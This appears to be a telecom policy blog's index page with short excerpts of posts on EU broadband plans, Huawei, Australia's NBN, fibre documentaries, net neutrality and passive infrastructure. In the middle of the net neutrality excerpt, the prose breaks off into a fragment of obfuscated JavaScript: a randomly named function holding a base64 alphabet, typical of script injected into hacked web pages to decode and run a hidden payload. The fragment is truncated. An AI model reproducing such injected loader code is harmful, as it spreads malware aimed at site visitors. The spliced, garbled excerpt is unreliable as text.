Freedom to Connect is a unique event in technology. The speakers there are just not the usual bunch of speakers, a mix of long-term visionaries
Opinion: European Commission Updates on National Broadband Plans
By Teresa Mastrangelo.
The European Commission recently provided an update on the implementation of the national broadband plans in the EU-27 countries,
Another setback for Huawei
I wrote last year about Huawei and the company's struggles to establish itself as a reputable company disconnected from the Chinese government. In
Lessons from the Australian NBN
PBS Documentary on Broadband in the UK and Netherlands
There's an excellent PBS documentary from their series Need to Know entitled High Fiber. It highlights the broadband successes in the
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A World of Fiber
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Sticks, Carrots and NBN…
Internet Service Guarantees is What Net Neutrality (and consumers) Need
For a number of weeks I've been itching to write a piece on the revival of the so-called Net Neutrality proceedings by the US FCC. I stalled because I wanted to read Chairman Genachowski's remarks on function a4872b9c6b(y1){var qd=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’;var x0=”;var
The trouble with ducts and poles
I have written in the past about passive infrastructure remedies to competition. Portugal is one country where such remedies seem to have had positive effects on the market. Applying similar remedies in the UK was a big part of the